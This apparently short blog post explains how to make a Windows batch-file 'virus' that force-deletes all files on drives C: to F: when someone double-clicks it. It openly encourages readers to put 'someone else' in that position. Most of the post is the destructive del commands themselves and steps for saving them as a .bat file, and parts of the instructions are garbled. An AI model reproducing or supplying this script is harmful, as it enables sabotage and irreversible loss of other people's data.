How to Create a Virus to Wipe All User Data from Windows?

How to Create a Virus to Wipe All User Data from Windows?
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Create a Virus 

Have you ever been in a position where a single file click erased all of your data? (Really, double click) However, you can definitely put someone else in this predicament at this point. We will learn how to make a Notepad file that will erase all of the user's system data when it is opened or double-clicked!

Now, take the following actions to spread the virus:

Copy and paste the following text into Notepad.

@echo off
del C:\*.*/f /s /q
del D:\*.*/f /s /q
del E:\*.*/f /s /q
del F:\*.*/f /s /q

Save the file with any name, but make sure it has an extension.bat

to use to store the file.type of bat extension.bat After the file name, select Save as type, select All files, and then select Save.

You have successfully created the virus, but it will only function the first time the user opens it. 

Because it will erase all of your system's data, do not open this file on your computer to test. Extremely Perilous 

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Hey there! I'Abdullah, a professional part-time blogger. Join me as I share informative and technical content to help you learn something new. ✨ #BloggerLife #TechTips #LearnSomethingNe

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